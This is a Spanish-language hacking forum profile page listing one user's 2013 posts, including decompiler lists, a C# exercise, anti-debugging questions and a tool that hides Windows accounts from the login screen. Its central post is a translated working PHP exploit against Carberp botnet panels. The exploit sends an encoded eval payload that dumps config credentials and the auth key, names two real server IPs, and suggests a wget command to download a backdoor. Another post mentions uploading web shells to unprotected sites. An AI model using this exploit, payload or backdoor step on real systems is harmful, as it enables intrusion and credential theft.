d1d4c 33
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
Páginas1
#3
Dudas y pedidos generales / Re:Bind Port?
Septiembre 13, 2013, 01:06:44 AM
Eso el lo que sospechaba, pero eso funciona si esta detras de un router, en NAT ?
#4
Dudas y pedidos generales / [SOLUCIONADO] Bind Port?
Septiembre 12, 2013, 11:50:48 PM
Hola Comunidad, tengo una pregunta que puedo no encontrar la respuesta en internet.
Que es y para que sirve Bind Port?, de esas que uno encuentra en algunas shell junto con el back connect ,(que si se para que funciona
),
Aca les dejo algunos ejemplos de algunas shell que subi a una unas cuantas paginas que encontre por ahi sin seguridad
.
Que es y para que sirve Bind Port?, de esas que uno encuentra en algunas shell junto con el back connect ,(que si se para que funciona
),Aca les dejo algunos ejemplos de algunas shell que subi a una unas cuantas paginas que encontre por ahi sin seguridad
.
#5
Otros lenguajes / Re:Aprende a pensar como Programador Jugando
Julio 26, 2013, 01:48:50 AM
Si que hace pensar 
Me he quedado en recursion lvl 4
Me he quedado en recursion lvl 4
#6
Bugs y Exploits / Carberp Remote Code Execution
Junio 29, 2013, 10:44:44 PM
Todos estan mirando el codigo fuente de Carpberp, bootkit y otros componentes pero ¿Se han puesto a investigar el codigo fuente del panel?
Aqui hablare sobre una simple injeccion de codigo pero hay muchas mas vulnerabilidades en estos paneles filtrados.
Ejemplo: Codigo estupido que permite IP spoofing:
No, pero en serio la mejor vulnerabilidad es la de ejecucion remota de codigo(RCE), el tipo que escribio esto es realmente retrasado mental
Miren el bloque del eval()!
Oh que oportuno, algunos paneles de Carpberp aparecieron en vx.vault
Ahora, escribamos un spl0it, pienso que la mayoria de ustedes vinieron por la prueba de concepto(PoC), verdad?
Código: php
La parte codificada hace un file_get_contents() al includes/config.php
Luego se conecta ala base de datos y muestra las credenciales de Carberp.(en caso de que no tengamos phpMyAdmin)
Pero esto seria inútil si nosotros no podemos mostrar la pagina de ingreso debido ala llave de Autenticacion, asi que el poc analiza el index.php y lo obtiene.
Genial payload huh?
Probemoslo ...
37.221.165.123:
91.214.202.117:
Lo he probado en algunos mas C&C(comanda y controla) y todo salio bien.
Y esto en un RCE asi que puedes ejecutar cosas interesantes como system('wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login');
para descargar una puerta trasera o cualquier cosa
Fuente:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Traducido por mi
Aqui hablare sobre una simple injeccion de codigo pero hay muchas mas vulnerabilidades en estos paneles filtrados.
Ejemplo: Codigo estupido que permite IP spoofing:
No, pero en serio la mejor vulnerabilidad es la de ejecucion remota de codigo(RCE), el tipo que escribio esto es realmente retrasado mental
Miren el bloque del eval()!
Oh que oportuno, algunos paneles de Carpberp aparecieron en vx.vault
Ahora, escribamos un spl0it, pienso que la mayoria de ustedes vinieron por la prueba de concepto(PoC), verdad?
Carberp RCE
<table width="607" border="0">
<tr>
<td><form method="POST" action="<?php basename($_SERVER['PHP_SELF']) ?>">
<label for="carberp">Domain: </label>
<input name="urlz" type="text" id="urlz" value="http://carberpPanel.com" size="50" />
<input type="submit" name="button" id="button" value="Ownz !" />
</form></td>
</tr>
<tr>
<td><?php
/*
Xyl2k!
Greeting to Xartrick for fixing the payload (:
*/
if(!isset($_POST['urlz'])) ;
else
if(!filter_var($_POST['urlz'], FILTER_VALIDATE_URL))
{
echo "<font color='red'>URL is not valid</font>";
}
else
{
{
$data = array(
'id' => 'BOTNETCHECKUPDATER0-WD8Sju5VR1HU8jlV',
'data' => 'Njk2ZTYzNmM3NTY0NjU1ZjZmNmU2MzY1MjgyNzY5NmU2MzZjNzU2NDY1NzMyZjYzNmY2ZTY2Njk2NzJlNzA2ODcwMjcyOTNiMjQ0MTNkMjIwZDBhMjIzYjY1NjM2ODZmMjgyNzQ0NjE3NDYxNjI2MTczNjUyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDg2ZjczNzQzYTIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY4NmY3Mzc0Mjc1ZDJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc1NTczNjU3MjNhMjAyNzJlMjQ2MzY2Njc1ZjY0NjI1YjI3NzU3MzY1NzIyNzVkMmUyNDQxMjkzYjY1NjM2ODZmMjgyNzUwNjE3MzczM2EyMDI3MmUyNDYzNjY2NzVmNjQ2MjViMjc3MDYxNzM3MzI3NWQyZTI0NDEyOTNiNjU2MzY4NmYyODI3NDQ0MjNhMjAyMDIwMjcyZTI0NjM2NjY3NWY2NDYyNWIyNzY0NjIyNzVkMmUyNDQxMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjYzNmY2ZTZlNjU2Mzc0MjgyNDYzNjY2NzVmNjQ2MjViMjc2ODZmNzM3NDI3NWQyYzI0NjM2NjY3NWY2NDYyNWIyNzc1NzM2NTcyMjc1ZDJjMjQ2MzY2Njc1ZjY0NjI1YjI3NzA2MTczNzMyNzVkMjkzYjZkNzk3MzcxNmM1ZjczNjU2YzY1NjM3NDVmNjQ2MjI4MjQ2MzY2Njc1ZjY0NjI1YjI3NjQ2MjI3NWQyOTNiMjQ0MjNkNmQ3OTczNzE2YzVmNzE3NTY1NzI3OTI4Mjc1MzQ1NGM0NTQzNTQyMDJhMjA0NjUyNGY0ZDIwNjI2NjVmNzU3MzY1NzI3MzI3MjkzYjY1NjM2ODZmMjgyNzU1NzM2NTcyNzMyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4MjcyZDJkMmQyZDJkMjcyZTI0NDEyOTNiNzc2ODY5NmM2NTI4MjQ0MzNkNmQ3OTczNzE2YzVmNjY2NTc0NjM2ODVmNjE3MzczNmY2MzI4MjQ0MjI5Mjk2NTYzNjg2ZjI4MjQ0MzViMjc2YzZmNjc2OTZlMjc1ZDJlMjczYTI3MmUyNDQzNWIyNzcwNjE3MzczNzc2ZjcyNjQyNzVkMmUyNDQxMjkzYjZkNzk3MzcxNmM1ZjY2NzI2NTY1NWY3MjY1NzM3NTZjNzQyODI0NDIyOTNiNmQ3OTczNzE2YzVmNjM2YzZmNzM2NTI4MjkzYjI0NDQzZDQ5Mjg2NjY5NmM2NTVmNjc2NTc0NWY2MzZmNmU3NDY1NmU3NDczMjgyNzY5NmU2NDY1NzgyZTcwNjg3MDI3MjkyOTNiNjU2MzY4NmYyODI0NDEyZTI3NDE3NTc0NjgyMDRiNjU3OTI3MmUyNDQxMjkzYjY1NjM2ODZmMjgyNzJkMmQyZDJkMmQyZDJkMmQyNzJlMjQ0MTI5M2I2NTYzNjg2ZjI4Mjc2ODc0NzQ3MDNhMmYyZjI3MmUyNDVmNTM0NTUyNTY0NTUyNWIyNzQ4NTQ1NDUwNWY0ODRmNTM1NDI3NWQyZTI3MmY2YzZmNjc2OTZlMmYzZjc4M2QyNzJlMjQ0NDI5M2I2Njc1NmU2Mzc0Njk2ZjZlMjA0OTI4MjQ0ODI5N2IyNDQ2M2Q2NTc4NzA2YzZmNjQ2NTI4MjcyNDYxNzU3NDZmNzI2OTdhNjU2YjY1NzkyNzJjMjQ0ODI5M2IyNDQ3M2Q2NTc4NzA2YzZmNjQ2NTI4MjczYjI3MmMyNDQ2NWIzMTVkMjkzYjY1NzY2MTZjMjgyNzI0NDUyNzJlMjQ0NzViMzA1ZDJlMjczYjI3MjkzYjcyNjU3NDc1NzI2ZTIwMjQ0NTNiN2Q=');
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $_POST['urlz'] . "/index.php");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch,CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,CURLOPT_TIMEOUT,30);
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
$contents = curl_exec($ch);
curl_close($ch);
if (preg_match("#-#", $contents))
{ echo "<pre>" . $contents . "</pre>"; }
else
{ echo "<font color='red'>Not vulnerable :(</font>"; }
}
}
?></td>
</tr>
</table>
La parte codificada hace un file_get_contents() al includes/config.php
Luego se conecta ala base de datos y muestra las credenciales de Carberp.(en caso de que no tengamos phpMyAdmin)
Pero esto seria inútil si nosotros no podemos mostrar la pagina de ingreso debido ala llave de Autenticacion, asi que el poc analiza el index.php y lo obtiene.
Genial payload huh?
Probemoslo ...
37.221.165.123:
91.214.202.117:
Lo he probado en algunos mas C&C(comanda y controla) y todo salio bien.
Y esto en un RCE asi que puedes ejecutar cosas interesantes como system('wget You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login');
para descargar una puerta trasera o cualquier cosa
Fuente:You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Traducido por mi
#7
Off Topic / Todo el mundo debería saber programar
Junio 27, 2013, 01:18:51 PM
Aca comparto un video motivacional donde aparecen personas exitosas que tratan de fomentar la programacion.
Como me hubiera gustado recibir una motivacion asi y aprender a programar desde pequeño
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Como me hubiera gustado recibir una motivacion asi y aprender a programar desde pequeño
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#8
C# - VB.NET / C# HideUser
Junio 25, 2013, 03:18:54 PM
Bueno aca les comparto un programa que su funcion es ocultar los usuarios de la pantalla de bienvenida de Windows y tambien en algunos aspectos en el SO como en el Panel de Control y UAC, pero logran aparecer con el comando net users
El programa no deshabilita las cuentas, las oculta,quedan igual de funcionales.
Aca sales las dos cuentas en la pantalla de inicio
Luego oculto usuario test
Exito,se oculto
Y si queremos volverlo a mostrar, lo siguiente debes de ejecutar
Lo dejo en proyecto visual studio, lo tienen que compilar
Si su equipo es de 32 bits, tienen que compilarlo en x86 y si es de 64 bits, en x64
Tambien hay una opcion de AnyCPU, para que funcione en los dos arquitecturas-esta esta seleccionada
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
El programa no deshabilita las cuentas, las oculta,quedan igual de funcionales.
Aca sales las dos cuentas en la pantalla de inicio
Luego oculto usuario test
Exito,se oculto
Y si queremos volverlo a mostrar, lo siguiente debes de ejecutar
Lo dejo en proyecto visual studio, lo tienen que compilar
Si su equipo es de 32 bits, tienen que compilarlo en x86 y si es de 64 bits, en x64
Tambien hay una opcion de AnyCPU, para que funcione en los dos arquitecturas-esta esta seleccionada
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
#9
Dudas y pedidos generales / [SOLUCIONADO] Ayuda con compilacion codigo Anti-debugging
Junio 21, 2013, 03:40:08 AM
Hola comunidad, tengo un problema al tratar de compilar esto
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es un truco de Anti-debugging (detecta 32-bit debuggers) que quisiera aplicar a mi programa, el problema es que al generar me sale
Código: text
El autor tambien ofrece un exe compilado y funciona perfecto, pero cuando añado el source a mi proyecto genera el error, busco por la red tratando de encontrar como solucionarlo pero casi no hay referencia de la funcion DbgPrompt
Depaso que me ayudan, se llevan a casa un truco anti-debugging
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Es un truco de Anti-debugging (detecta 32-bit debuggers) que quisiera aplicar a mi programa, el problema es que al generar me sale
[code]Error 1 error LNK2019: símbolo externo _DbgPrompt@12 sin resolver al que se hace referencia en la función _mainEl autor tambien ofrece un exe compilado y funciona perfecto, pero cuando añado el source a mi proyecto genera el error, busco por la red tratando de encontrar como solucionarlo pero casi no hay referencia de la funcion DbgPrompt
Depaso que me ayudan, se llevan a casa un truco anti-debugging
#10
Ingeniería Inversa / Reverse Engineering .NET Tools List
Junio 20, 2013, 01:42:22 AM
Bueno aca les dejo una lista de las tools que he encontrado en la red para hacer reversing/decompiling/disassembler/patching/deobfuscation de aplicaciones .net. 
.NET Reflector You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login - de pago - trial
Dis# You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - trial
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - trial
Salamander .NET Decompiler You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - demo online
.NET CodeReflect You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
Monodis You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Open Source
ILSpy You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Open Source
dotPeek You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
Just Decompile You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
Explorer Suite You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
Dotnet IL Editor You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
ShowMyCode You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free Online
GrayWolf You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
NetDasm You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Open Source
Zeta Resource Editor You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free
MSIL Disassembler (Ildasm.exe) You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free - Tambien viene instalado por defecto con Visual Studio
He probado algunos pero personalmente me quedo con GrayWolf, como reemplazo al .reflector que es de pago y aparte tiene un bonito DarkCode
.NET Reflector You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login - de pago - trial Dis# You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - trial You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - trial Salamander .NET Decompiler You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Pago - demo online ILSpy You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Open Source dotPeek You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free Just Decompile You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free Explorer Suite You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free ShowMyCode You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free Online GrayWolf You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login Free Zeta Resource Editor You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login FreeHe probado algunos pero personalmente me quedo con GrayWolf, como reemplazo al .reflector que es de pago
y aparte tiene un bonito DarkCode #11
Dudas y pedidos generales / Re:Problema al iniciar sesion en kali linux
Junio 19, 2013, 03:31:43 PM
Seguro has modificado algun script de incio(/etc/init.d) , ami me paso por error(queria hacer que el servicio de mysql iniciara automaticamente al prender) y luego tuve que copiarlo el archivo desde una nueva maquina con Kali.
y luego tuve que copiarlo el archivo desde una nueva maquina con Kali.
#12
C# - VB.NET / Re:Desafío 1
Junio 18, 2013, 04:32:47 PM
Bueno respondo al desafio que me tomo una que otras dificultades al convertir las medidas, pero ya esta
Código: csharp
using System;
using System.Text;
namespace dvt
{
class Program
{
static double distancia, velocidad;
static uint horas, minutos, segundos, distipo, salida;
static void ingresodatos(int var)
{
bool correcto=false;
while (!correcto)
{
try
{
if (var == 1)
{
distancia = Convert.ToDouble(Console.ReadLine());
correcto = true;
}
else if (var == 2)
{
distipo = Convert.ToUInt32(Console.ReadLine());
correcto = true;
}
else if (var == 3)
{
horas= Convert.ToUInt32(Console.ReadLine());
correcto = true;
}
else if (var == 4)
{
minutos=Convert.ToUInt32(Console.ReadLine());
correcto = true;
}
else if (var == 5)
{
segundos = Convert.ToUInt32(Console.ReadLine());
correcto = true;
}
else if (var == 6)
{
salida = Convert.ToUInt32(Console.ReadLine());
correcto = true;
}
}
catch {
Console.WriteLine("!Ingrese correctamente los datos!");
}
}
}
static double calcuVelo()
{
double sum=0;
sum = (horas + minutos / 60.0 + segundos / 3600.0);
if (distipo == 1)
{
velocidad = distancia/1000.0 / sum;
velocidad = Math.Round(velocidad, 4);
if (salida == 1) { velocidad = Math.Round(velocidad / 3.6,4); }
}
else if (distipo == 2)
{
velocidad = distancia / sum;
velocidad = Math.Round(velocidad, 4);
if (salida == 1) { velocidad = Math.Round(velocidad / 3.6,4); }
}
return velocidad;
}
static void Main(string[] args)
{
Console.WriteLine("Ingrese distancia a recorrer ");
ingresodatos(1);
Console.WriteLine("Ingrese unidad de distancia[n]");
Console.WriteLine("[1]:metros");
Console.WriteLine("[2]:kilometros");
ingresodatos(2);
Console.WriteLine("Ingrese tiempo deseado");
Console.WriteLine("Ingrese horas");
ingresodatos(3);
Console.WriteLine("Ingrese minutos");
ingresodatos(4);
Console.WriteLine("Ingrese segundos");
ingresodatos(5);
Console.WriteLine("Ingrese unidades de salida");
Console.WriteLine("[1]:m/s");
Console.WriteLine("[2]:km/h");
ingresodatos(6);
Console.WriteLine("Velocidad necesitada es de:");
Console.WriteLine(calcuVelo().ToString());
Console.WriteLine("salir");
Console.ReadLine();
}
}
}
#13
ASM / Re:[ASM] AntiDebugging - Crashea el OllyDbg sin siquiera iniciar la ejecución
Junio 18, 2013, 01:24:45 PMYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or LoginYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Podrias explicar cual es el metodo que utilizas para colocarlo, soy nuevo en este mundo
En que compilador y lenguaje?
Seria preferible en Visual C++, tengo el 2010, gracias
#14
ASM / Re:[ASM] AntiDebugging - Crashea el OllyDbg sin siquiera iniciar la ejecución
Junio 18, 2013, 05:55:46 AM
Podrias explicar cual es el metodo que utilizas para colocarlo, soy nuevo en este mundo 
#15
Presentaciones y cumpleaños / Hola!
Junio 12, 2013, 01:49:48 PM
Bueno me presento ante la comunidad, espero aprender mucho y tratar de aportar un poco de lo que se.
Páginas1
